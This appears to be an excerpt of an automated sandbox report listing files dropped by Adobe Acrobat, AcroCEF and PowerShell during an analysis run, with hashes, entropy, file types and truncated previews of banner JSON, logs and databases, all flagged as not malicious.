SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfFldPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGz8Ukee9
MD5:8B9F0E36929B02584B8B871F7D6966B5
SHA1:0023B80FA7BC70725595C4EE882A59B4A4950C88
SHA-256:A956D0B52960170A9AF69B443162E024DFDE633647B6AD146E77A1EA7F7BB82B
SHA-512:592F72A223CCB642C7463CAD7D8100641D7084C70430E8CC194AEAC3D8E09A751B7AB7ED74522B91926A60650992DEE4C9132FCA56965FA9EFB00A4A4A3187FF
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):295
Entropy (8bit):5.300103688579784
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfzdPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGb8Ukee9
MD5:4041EDC59A7AEED290879E4E62CBE642
SHA1:7A15641FECA31E02A519212B46CE288F9E352926
SHA-256:4EA4D01A17C73AD40531B36EAAD248A5823B7EB99988C2E796FCD7B5BD5BB95D
SHA-512:6382595C4E5AD9742C649DCD50E0833346A8AB56F0286EC9569A0CF092BB76FAB790B0E1D905F0FD07C860EDA87550EEB77A50DE917BA1F61B1654F5D5C4CB34
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):289
Entropy (8bit):5.280347571166507
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfYdPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGg8Ukee9
MD5:0F08A11DA6F38CA652FE38A7683BD28A
SHA1:4E1A702CBF0BCB244561A7549649C5AD4ACF2CFC
SHA-256:CF5372E7A7C5C87493F971C13D4827FEA0589A4FB8E34A62B79E043A4323CE14
SHA-512:3A507FF8ABD71258629F839D4B8BCD9CB3EB6095C323DDB5EE0ADB31CD748C4788BE13535164F1E0FA408951BC04DC2A20279A8ED25C6624AF99F0556B4B22B4
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):284
Entropy (8bit):5.267154893056928
Encrypted:false
SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJf+dPeUkwRe9:YvXKXFGAUP62vR/ZwHACnG28Ukee9
MD5:06B578BB1A8D8F79EC7988C8EA20001F
SHA1:6AB66891C2C0452DB58C9881BD8DC11FCB022B77
SHA-256:BFD3234AC34CD57D525735F9A07B3CE480ACD2861B0378AE9BC20EF6FE9FCF61
SHA-512:7C0A4F2478541BF0D25ABA2ADF982AA479A264E754C374ADC61F04B2418934B7F92AF68EA8F3FF2770D3842F58A387D5056A1922CE5FDAA18002782A8981DC02
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.264029737079775
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfbPtdPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGDV8Ukee9
                                                                                            MD5:4A9B8D441C960E185C49F11197E9DA55
                                                                                            SHA1:7B80005D6D928317F1C8AE0F05471CF4C6AADD14
                                                                                            SHA-256:6F56AEB57ACA5903FC9F75E385DF195E2C58BB2C42EA0592110705BB31B9E0D1
                                                                                            SHA-512:3A192EFAE7E88140556189C51E121A4C2AFF5678274B638CCD5EE369229D81BB8495DE1D554719DED0299B34EA08339BBC8B113DB88C54011865D0CF1D02EC5C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):287
                                                                                            Entropy (8bit):5.262800667357767
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJf21rPeUkwRe9:YvXKXFGAUP62vR/ZwHACnG+16Ukee9
                                                                                            MD5:4412B554D4392F51D0C6942A0E6791EC
                                                                                            SHA1:DAA3F0980A522AAEB997F52ADA879C78A2D2751C
                                                                                            SHA-256:3D340DBC81E3A5A02F2CD677A06147AA968E8067CAA48D70C5DB858A83347C5D
                                                                                            SHA-512:171E61C72CC530C0F24DB0BCAA533E533D596F1FE1E3CA745BFED92C08F13FF21111C2D374051CA35AF451B5207A831AB40F508D477EA987015F2F6A1795E0F1
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1090
                                                                                            Entropy (8bit):5.658523406023469
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X8AUP62Jh/amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSO:Yv1A/2JhXBgkDMUJUAh8cvMO
                                                                                            MD5:457CFB4B8B64A0802741A916C85509B3
                                                                                            SHA1:DEF74EAE19186BB1589AA7C2202BA305139FBF99
                                                                                            SHA-256:E2809453D53B4E52142DFBEA8538C89D38A4D8C604E05F6E119DBCB0378EAB13
                                                                                            SHA-512:9041105413BECF52F08971F244A99514DB08DC97430DE989D7AA323343C0923A8F892F18050FF542ECD8D0C46FBD2225A42952712D0E7A08BFC6F12185102773
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):5.239151539117832
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfshHHrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGUUUkee9
                                                                                            MD5:9CF971B9ED8D6280AB5AB62B4BA55EE3
                                                                                            SHA1:C98F3697CB19A1DF3AEDE1AEEE0F2275B3136CDC
                                                                                            SHA-256:FF93649ADB878B78C908177ED823ED6DFE3EB5EA7F2DA79817E68852014216B7
                                                                                            SHA-512:474DA131946C7232099A589F6C268ED72BBAF1005690A7E95A6CE23ADBCE83E8614B56376AB04827708621E5E6E631A6E96959495EAB1C2E80779D18D2932A8B
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):282
                                                                                            Entropy (8bit):5.261752014727189
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJTqgFCrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGTq16Ukee9
                                                                                            MD5:5EF42401DC1124AFA0537A9D21A20E70
                                                                                            SHA1:64AC9B7F8FC5F5DC9C49CD8F26BF2BD280398546
                                                                                            SHA-256:4218CAF010767C9ED7DF1E4788AC248E05C27A377C17C246E6E5BDA56DACA183
                                                                                            SHA-512:30F6FBAA1E98B82A5B8772E1C33F81F6D3F56771DDADC153FE8F710B9E6142B220C26886F8AC29C96FE5FE6779EEBF5AA0A12C032DFD23168393423D1505F3F5
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):0.8112781244591328
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:e:e
                                                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                            Malicious:false
                                                                                            Preview:....
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2814
                                                                                            Entropy (8bit):5.124847692038648
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:Y5JWFTMjShNQ6leT5uDjLEEMSdvAF9wQz:UJWFTM2Q6IT5uIdwvkwQz
                                                                                            MD5:91BEB1CF3627DF71CC5442F7B61B15DC
                                                                                            SHA1:C1650295B9638287321C7A6860113CCD35491D42
                                                                                            SHA-256:4F0F01CA011D136B0210BCBC06ED48973AC2280625514BC033C9BA0C8CCA9065
                                                                                            SHA-512:8EC389B1F7B567548954B2D0F6964DFFB727EDF279C26066C3A7326010B86ADA8D91F9D9DE44B8CDA78F15EED56688BB42F293275AE040D46B4948D00404F1E1
                                                                                            Malicious:false
                                                                                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"6ef3d92bcaf0d1bac8e60cccdd506b6d","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734609059000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"0f231ef0f5050200afeab4d9c69639f4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734609059000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c4a45a255cf81a7231a198d681fb4de7","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734609059000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"65cf2a21d5626675cdacd434229db536","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734609059000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"8ae68927ec23f135fdeae9efaa7bd8d5","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734609059000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"70f0b2be971a65f5bc321ceb2faf8b3d","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                            Category:dropped
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):1.318048930431809
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:TGufl2GL7ms9WR1CPmPbPahIAVypilIiAt:lNVms9WfMwbPahFVct
                                                                                            MD5:D1576B9C36EAB45F135B80259F718707
                                                                                            SHA1:FD682C78FEE89247D907E40936E4F965450F497D
                                                                                            SHA-256:320CB158CEC9E9E803771BE9BF6C849E79B5A986437BB1762A3CD8A61D42C3C9
                                                                                            SHA-512:E321F6F3574D0B4D08CCA2EFC973FB42AD4FEA6378221876233ED098C90CBE468C5B21672B59035E8F683F81AE8682902E29AD428F026658F3CAD4497203AE9A
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):1.780172401335634
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:7MqWR1CPmPbPahIAQypilIMqFl2GL7ms5:7TWfMwbPahFQNKVms5
                                                                                            MD5:A9B4AFF39200AAC4E437A3E4B44577C0
                                                                                            SHA1:F3B00101329323CBEAF9E64F9755B1688EAC24B3
                                                                                            SHA-256:43DC3A18F66A0BF6D2A2A3956FF1795A8D7A0C18A87D81EF0F1BF5F63708D4FF
                                                                                            SHA-512:8C64C41FCD1DEA88263C72DACD25CBDD685BEDFE2E90868A0FE0D00AB87675E3BE56576B1F636324CCB2B8F91BFCB4F14BB3B08565A91C22D6AC77D43FAEB218
                                                                                            Malicious:false
                                                                                            Preview:.... .c......n...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66726
                                                                                            Entropy (8bit):5.392739213842091
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEg1PDZzZ7ClPsyIyecVfvUcNwXRYyu:6a6TZ44ADE1PDZzNClmyVnMK
                                                                                            MD5:D586DD978DC5C8C3D469535356F584A6
                                                                                            SHA1:047C4CE65807355A56E1C6A6A36AB926607E0B24
                                                                                            SHA-256:960D95BCD603D1CBDDCB5FB4CF3B24C4FD1743016EB204E4044E4C9E39620BAC
                                                                                            SHA-512:7D1A19BAC182D376B5562A6C1C803EEE446DF7909AF123FB2F6945631EA0BF5E6960F1AB1BEE33763D452FFCC4024E4F8103E900B6BAD4FEB5E046362406B477
                                                                                            Malicious:false
                                                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulT/Et/Z:NllUA
                                                                                            MD5:68534726499B237218CD6D499AFF54E9
                                                                                            SHA1:8826365E26F51534ED2FF4E576A8ED3E6B4C0A2A
                                                                                            SHA-256:6B7B680E749AE616DE27D370135FBDE254E440FCD90EC1FCF9927EAF6739D5F8
                                                                                            SHA-512:29405FD901AB27EB64FAA068D94C1B2F024DBB9D6215D3C8E08BAB8E6553F44748A8AE330DCC1EC6234B54E1A8A38DF525CCF0F1BC097E872BD97AB304B719D1
                                                                                            Malicious:false
                                                                                            Preview:@...e................................................@..........
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.5309417490522437
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAz9:Qw946cPbiOxDlbYnuRKr9
                                                                                            MD5:B250785B3C50142AFB18608FB69112DA
                                                                                            SHA1:F2161F8882A762E4D7753683BAC023A299D1925F
                                                                                            SHA-256:F8CC496F11161B5D50411F461CC2FE4829BC204F61DABB34C04C0DB3597A0B24
                                                                                            SHA-512:0F7E9225E9C9260C795C05BADF976093A7EC6639618839F002CF88473090B3DFD3653C1EDFA82C889FD4043DA3AE274E219A2D92FA33041B601CFF53073281D1
                                                                                            Malicious:false
                                                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.0.:.5.4. .=.=.=.....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393)
                                                                                            Category:dropped
                                                                                            Size (bytes):16525
                                                                                            Entropy (8bit):5.33860678500249
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                                            MD5:C3FEDB046D1699616E22C50131AAF109
                                                                                            SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                                            SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                                            SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                                            Malicious:false
                                                                                            Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):15114
                                                                                            Entropy (8bit):5.324009256143688
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:JRFUdxY+kUm3kL46r9Lp7JWWWFpW03fGPMRgNglN9JRMe3nRNvfwjgRWR8ZUqeVL:qaa
                                                                                            MD5:93AA2707274A69BDDE47481D4564D53E
                                                                                            SHA1:585408211954572D16DFEA77DD8CFAD711EAD7DF
                                                                                            SHA-256:52E843200CBED32E6BF9ED9220D43903CC069D2A323FC2D298542C00A7AAD1E9
                                                                                            SHA-512:905FC9862D59179733CC08911CDAB53A6FEB7C21144A48C8C1D8C9ACA295276932A9F57B30331485C9C4DE7FC8F1DAC41618E6AFCC4947401654C1DDDC89457E
                                                                                            Malicious:false
                                                                                            Preview:SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:790-0500 ThreadID=7628 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29752
                                                                                            Entropy (8bit):5.417048843545556
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbasA/A/ADAGATAIADAwA0A5dsAwAw:ceo4+rsCYooc7sBcZ9FZLMdecdgleASz
                                                                                            MD5:825808EA7F1A2BD5CC3775C47A077516
                                                                                            SHA1:61A07D9D0F18994392421EFC302BE8FCFEB1C504
                                                                                            SHA-256:6CD1204F55605E802DC6D54F83FE008B4BF2266419970082BB08189581EA42B1
                                                                                            SHA-512:CE41E0091A378E0A1018FA067FDB7E4332828AB0A3C91DCF5FA3D84D992F5DF33AAF940BEB38A7B071FE29012F911B9CEDDFF2662FCA65B7D295A8097E3373F5
                                                                                            Malicious:false
                                                                                            Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                            Category:dropped
                                                                                            Size (bytes):1419751
                                                                                            Entropy (8bit):7.976496077007677
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
                                                                                            MD5:CA6B0D9F8DDC295DACE8157B69CA7CF6
                                                                                            SHA1:6299B4A49AB28786E7BF75E1481D8011E6022AF4
